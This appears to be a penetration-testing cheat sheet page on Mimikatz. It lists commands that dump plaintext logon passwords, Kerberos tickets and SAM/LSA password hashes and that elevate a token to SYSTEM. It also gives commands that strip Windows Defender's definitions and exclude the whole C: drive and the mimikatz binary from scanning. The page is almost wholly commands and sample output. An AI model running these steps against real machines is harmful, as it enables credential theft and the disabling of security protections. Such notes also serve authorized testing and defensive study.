Mimikatz

# The steps are:
mimikatz.exe
mimikatz # privilege::debug
mimikatz # log nameoflog.log
mimikatz # sekurlsa::logonpasswords

# Kerberos tickets
mimikatz # sekurlsa::tickets

# Export tickets
mimikatz # kerberos::list /export

# To elevate privileges
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::whoami
* Process Token : 623884 vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-
1210654043-1600862990-1000 (14g,24p) Primary
* Thread Token : no token

mimikatz # token::elevate
Token Id : 0
User name :
SID name : AUTORITE NT\System

# Dump the hashes
mimikatz # lsadump::sam
mimikatz # lsadump::lsa

Bypass Windows Defender

c:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All -DisableIOAVProtection $true
Add-MpPreference -ExclusionPath "c:\"

$mimikatz = 'C:\Users\Gentil Kiwi\Desktop\mimikatz.exe' ; Add-MpPreference -ExclusionPath $mimikatz -AttackSurfaceReductionOnlyExclusions $mimikatz

Previousmsfvenon NextDocker

Last updated 5 years ago